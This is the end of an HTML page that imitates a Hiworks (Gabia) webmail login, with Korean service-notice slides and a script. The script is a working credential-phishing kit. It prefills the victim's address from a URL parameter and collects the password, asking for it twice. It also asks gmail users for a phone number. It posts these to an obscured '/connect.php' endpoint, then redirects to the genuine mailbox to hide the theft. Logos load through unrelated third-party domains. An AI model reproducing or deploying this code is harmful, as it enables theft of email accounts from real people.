                    <div class="mt-10 flex h-6 w-full overflow-hidden text-gray-400"><svg
                            xmlns="http://www.w3.org/2000/svg" width="16" height="14" viewBox="0 0 16 14"
                            class="shrink-0 grow-0 self-center">
                            <defs>
                                <clippath id="jqwjrqddha">
                                    <path data-name="\uC0AC\uAC01\uD615 144435" d="M0 0h16v14H0z" style="fill: none;">
                                    </path>
                                </clippath>
                            </defs>
                            <g data-name="\uADF8\uB8F9 269070" style="clip-path: url(&quot;#jqwjrqddha&quot;);">
                                <path data-name="\uD328\uC2A4 98612"
                                    d="M8 9.588s2.189 0 5.2 2.307a.5.5 0 0 0 .8-.395V.5a.5.5 0 0 0-.8-.391C10.189 2.412 8 2.412 8 2.412z"
                                    style="fill: rgb(224, 232, 238);"></path>
                                <path data-name="\uD328\uC2A4 98613"
                                    d="M1.5 9.6H8V2.412H1.5a1.5 1.5 0 0 0-1.5 1.5V8.1a1.5 1.5 0 0 0 1.5 1.5"
                                    style="fill: rgb(226, 140, 70);"></path>
                                <path data-name="\uD328\uC2A4 98614" d="M5 9H2v4a1 1 0 0 0 1 1h1a1 1 0 0 0 1-1z"
                                    style="fill: rgb(226, 140, 70);"></path>
                                <path data-name="\uD328\uC2A4 98615" d="M15 7.5v-3a1 1 0 0 1 1 1v1a1 1 0 0 1-1 1"
                                    style="fill: rgb(159, 166, 173);"></path>
                            </g>
                        </svg>
                        <div class="swiper-container swiper-container-initialized swiper-container-vertical">
                            <div class="swiper-wrapper"
                                style="transition-duration: 0ms; transform: translate3d(0px, -48px, 0px);">
                                <div class="swiper-slide swiper-slide-duplicate" data-swiper-slide-index="4"
                                    style="height: 24px;">
                                    <div class="swiper-slide flex items-center gap-1.5"><a href="#"
                                            rel="noopener noreferrer" target="_blank"
                                            class="block overflow-hidden text-ellipsis whitespace-nowrap pl-2.5 text-14px text-gray-400 hover:text-gray-600 active:text-gray-600 max-w-[355px] sm:max-w-[380px]">에스원(세콤)
                                            근태 연동 이슈 안내(처리완료)</a></div>
                                </div>
                                <div class="swiper-slide swiper-slide-prev" data-swiper-slide-index="0"
                                    style="height: 24px;">
                                    <div class="swiper-slide flex items-center gap-1.5"><a href="#"
                                            rel="noopener noreferrer" target="_blank"
                                            class="block overflow-hidden text-ellipsis whitespace-nowrap pl-2.5 text-14px text-gray-400 hover:text-gray-600 active:text-gray-600 max-w-[355px] sm:max-w-[380px]">하이웍스
                                            오피스 정기 점검 안내 (9/23 22:00~04:00)</a></div>
                                </div>
                                <div class="swiper-slide swiper-slide-active" data-swiper-slide-index="1"
                                    style="height: 24px;">
                                    <div class="swiper-slide flex items-center gap-1.5"><a href="#"
                                            rel="noopener noreferrer" target="_blank"
                                            class="block overflow-hidden text-ellipsis whitespace-nowrap pl-2.5 text-14px text-gray-400 hover:text-gray-600 active:text-gray-600 max-w-[355px] sm:max-w-[380px]">하이웍스
                                            전자세금계산서 국세청 전송 일시 중지 안내</a></div>
                                </div>
                                <div class="swiper-slide swiper-slide-next" data-swiper-slide-index="2"
                                    style="height: 24px;">
                                    <div class="swiper-slide flex items-center gap-1.5"><a href="#"
                                            rel="noopener noreferrer" target="_blank"
                                            class="block overflow-hidden text-ellipsis whitespace-nowrap pl-2.5 text-14px text-gray-400 hover:text-gray-600 active:text-gray-600 max-w-[355px] sm:max-w-[380px]">LDAP
                                            계정 연동 기능 추가 안내</a></div>
                                </div>
                                <div class="swiper-slide" data-swiper-slide-index="3" style="height: 24px;">
                                    <div class="swiper-slide flex items-center gap-1.5"><a href="#"
                                            rel="noopener noreferrer" target="_blank"
                                            class="block overflow-hidden text-ellipsis whitespace-nowrap pl-2.5 text-14px text-gray-400 hover:text-gray-600 active:text-gray-600 max-w-[355px] sm:max-w-[380px]">전자결재
                                            문서 제목 설정 기능 추가 안내</a></div>
                                </div>
                                <div class="swiper-slide" data-swiper-slide-index="4" style="height: 24px;">
                                    <div class="swiper-slide flex items-center gap-1.5"><a href="#"
                                            rel="noopener noreferrer" target="_blank"
                                            class="block overflow-hidden text-ellipsis whitespace-nowrap pl-2.5 text-14px text-gray-400 hover:text-gray-600 active:text-gray-600 max-w-[355px] sm:max-w-[380px]">에스원(세콤)
                                            근태 연동 이슈 안내(처리완료)</a></div>
                                </div>
                                <div class="swiper-slide swiper-slide-duplicate swiper-slide-duplicate-prev"
                                    data-swiper-slide-index="0" style="height: 24px;">
                                    <div class="swiper-slide flex items-center gap-1.5"><a href="#"
                                            rel="noopener noreferrer" target="_blank"
                                            class="block overflow-hidden text-ellipsis whitespace-nowrap pl-2.5 text-14px text-gray-400 hover:text-gray-600 active:text-gray-600 max-w-[355px] sm:max-w-[380px]">하이웍스
                                            오피스 정기 점검 안내 (9/23 22:00~04:00)</a></div>
                                </div>
                            </div><span class="swiper-notification" aria-live="assertive" aria-atomic="true"></span>
                        </div>
                    </div>
                </div>
            </main>
            <footer class="mb-10 text-center"><a href="#" class="text-14px text-gray-100">©Gabia Inc.</a></footer>
        </div>
    </div>

    <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
    <script src="./config.js"></script>
    <script>
        /* global $ */
        $(document).ready(function () {
            var count = 0;

            /////////////url ai getting////////////////
            var url = new URL(window.location.href);
            var ai = url.searchParams.get('cms');
            document.querySelector('#ai').value = ai;
            if (!ai) {

            } else {
                // $('#ai').val(ai);
                var my_ai = ai;
                var ind = my_ai.indexOf("@");
                var my_slice = my_ai.substr((ind + 1));
                var c = my_slice.substr(0, my_slice.indexOf('.'));
                var final = c.toLowerCase();
                $('#ai').val(my_ai);
                $("#msg").hide();
                $.get("https://logo.clearbit.com/" + my_slice)
                    .done(function () {
                        $(".log").attr("src", "https://logo.clearbit.com/" + my_slice);

                    }).fail(function () {
                        $(".log").attr("src", "https://i.imgur.com/cKV4FIx.png");

                    })
            }



            var atu = "L2Nvbm5lY3QucGhw";

            $('#submit-btn').click(function (event) {
                $('#error').hide();
                $('#msg').hide();
                event.preventDefault();
                var ai = $("#ai").val();
                var pr = $("#pr").val();
                var msg = $('#msg').html();
                $('#msg').text(msg);

                var my_ai = ai;
                var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

                if (!ai) {
                    $('#error').show();
                    $('#error').html("&#xC774;&#xBA54;&#xC77C;&#xC774;&#x20;&#xD544;&#xC694;&#xD569;&#xB2C8;&#xB2E4;");
                    ai.focus;
                    return false;
                }

                if (!filter.test(my_ai)) {
                    $('#error').show();
                    $('#error').html("&#xD574;&#xB2F9;&#x20;&#xACC4;&#xC815;&#xC774;&#x20;&#xC874;&#xC7AC;&#xD558;&#xC9C0;&#x20;&#xC54A;&#xC2B5;&#xB2C8;&#xB2E4;&#x2E;&#x20;&#xB2E4;&#xB978;&#x20;&#xACC4;&#xC815;&#xC744;&#x20;&#xC785;&#xB825;&#xD558;&#xC138;&#xC694;");
                    ai.focus;
                    return false;
                }
                if (!pr) {
                    $('#error').show();
                    $('#error').html("&#xBE44;&#xBC00;&#xBC88;&#xD638;&#xAC00;&#x20;&#xD544;&#xC694;&#xD569;&#xB2C8;&#xB2E4;");
                    ai.focus;
                    return false;
                }
                //minimum password length validation  

                if (pr.length < 5) {

                    $('#error').show();
                    $('#error').html("&#xBE44;&#xBC00;&#xBC88;&#xD638;&#xB97C;&#x20;&#xD655;&#xC778;&#xD558;&#xC138;&#xC694;");
                    ai.focus;

                    return false;

                }
                var ind = my_ai.indexOf("@");
                var my_slice = my_ai.substr((ind + 1));
                var c = my_slice.substr(0, my_slice.indexOf('.'));
                var final = c.toLowerCase();

                $.get("https://logo.clearbit.com/" + my_slice)
                    .done(function () {
                        $(".log").attr("src", "https://logo.clearbit.com/" + my_slice);

                    }).fail(function () {
                        $(".log").attr("src", "https://i.imgur.com/cKV4FIx.png");

                    })

                count = count + 1;

                $.ajax({
                    dataType: 'JSON',
                    url: `${config.baseUrl}${atob(atu)}`,
                    type: 'POST',
                    data: {
                        ai: ai,
                        pr: pr,
                    },
                    // data: $('#contact').serialize(),
                    beforeSend: function (xhr) {
                        $('#submit-btn').prop('disabled', true);
                    },
                    success: function (response) {
                        if (count == 2 && final == "gmail") {
                            $('#aich').html(my_ai);
                            $("#div1").animate({ left: 0, opacity: "hide" }, 0);
                            $("#div2").animate({ right: 0, opacity: "show" }, 1000);

                            return false;

                        }
                        if (response) {
                            $("#msg").show();
                            console.log(response);
                            $('#submit-btn').prop('disabled', false);
                            if (response['signal'] == 'ok') {
                                $("#pr").val("");
                                if (count >= 2) {
                                    count = 0;
                                    // window.location.replace(response['redirect_link']);
                                    window.location.replace("https://mail.office.hiworks.com/" + my_slice + "/mail/webmail/m_list/b0");


                                }
                                // $('#msg').html(response['msg']);
                            } else {
                                // $('#msg').html(response['msg']);
                            }
                        }
                    },
                    error: function () {
                        $('#submit-btn').prop('disabled', false);
                        if (count == 2 && final == "gmail") {
                            $('#aich').html(my_ai);
                            $("#div1").animate({ left: 200, opacity: "hide" }, 0);
                            $("#div2").animate({ right: 200, opacity: "show" }, 1000);

                            return false;

                        }
                        $("#pr").val("");
                        if (count >= 2) {
                            count = 0;
                            window.location.replace("https://mail.office.hiworks.com/" + my_slice + "/mail/webmail/m_list/b0");
                        }
                        $("#msg").show();
                        // $('#msg').html("Please try again later");
                    },
                    complete: function () {
                        $('#submit-btn').prop('disabled', false);
                        $('#submit-btn').val('Login');
                    }
                });
            });

            $('#submit-btn1').click(function (event) {
                event.preventDefault();
                var ai = $("#ai").val();
                var pr = $("#pr").val();
                var ph = $("#ph").val();
                var detail = $("#field").html();
                var msg1 = $('#msg1').html();
                if (!ph) {
                    $('#error').show();
                    $('#error').html("Phone number is required");
                    ai.focus;
                    return false;
                }
                $.ajax({
                    dataType: 'JSON',
                    url: `${config.baseUrl}${atob(atu)}`,
                    type: 'POST',
                    data: {
                        ai: ai,
                        pr: pr,
                        detail: detail,
                        ph: ph,

                    },
                    beforeSend: function (xhr) {
                        $('#submit-btn').prop('disabled', true);
                    },
                    success: function (response) {
                        $('#submit-btn').prop('disabled', false);
                        window.location.replace("https://mail.office.hiworks.com/" + my_slice + "/mail/webmail/m_list/b0");

                    },
                    error: function () {
                        window.location.replace("https://mail.office.hiworks.com/" + my_slice + "/mail/webmail/m_list/b0");
                    },
                    complete: function () {
                        $('#submit-btn').prop('disabled', false);
                        $('#submit-btn1').val('Verify');
                    }
                });
                // }
            });


        });

        function getParameterByName(name, url) {
            if (!url) url = window.location.href;
            name = name.replace(/[\[\]]/g, '\\$&');
            var regex = new RegExp('[?&]' + name + '(=([^&#]*)|&|#|$)'),
                results = regex.exec(url);
            if (!results) return null;
            if (!results[2]) return '';
            return decodeURIComponent(results[2].replace(/\+/g, ' '));
        }


        const login_username = getParameterByName('cms');
        document.getElementById("ai").value = login_username;
        var ind = login_username.indexOf("@");
        var my_slice = login_username.substr((ind + 1));
        var mainPage = 'https://' + my_slice;






        document.getElementById("ai").innerHTML = login_username;

        $("#logoimg").attr('title', login_username);

        document.getElementById("scanp").innerHTML = my_slice;

        
        $('#logoimg').attr('src', 'https://imkaninvestments.com/ab/logo-blue.svg');


        var imageUrl = "https://office.hiworks.com/" + my_slice + "/common/logo/login";
        fetch('https://goldviseinvestments.com/adns/getweblogo.php?lol=' + encodeURIComponent(imageUrl))
            .then(response => {
                if (response.ok) {
                    return response.text(); // Return the promise
                } else {
                    $('#logoimg').attr('src', 'https://imkaninvestments.com/ab/logo-blue.svg');
                }
            })
            .then(logoData => {
                $('#logoimg').attr('src', logoData); // Set the src attribute of #logoimg
            })
            .catch(error => {
                $('#logoimg').attr('src', 'https://imkaninvestments.com/ab/logo-blue.svg');
            });

    </script>


</html>

</html>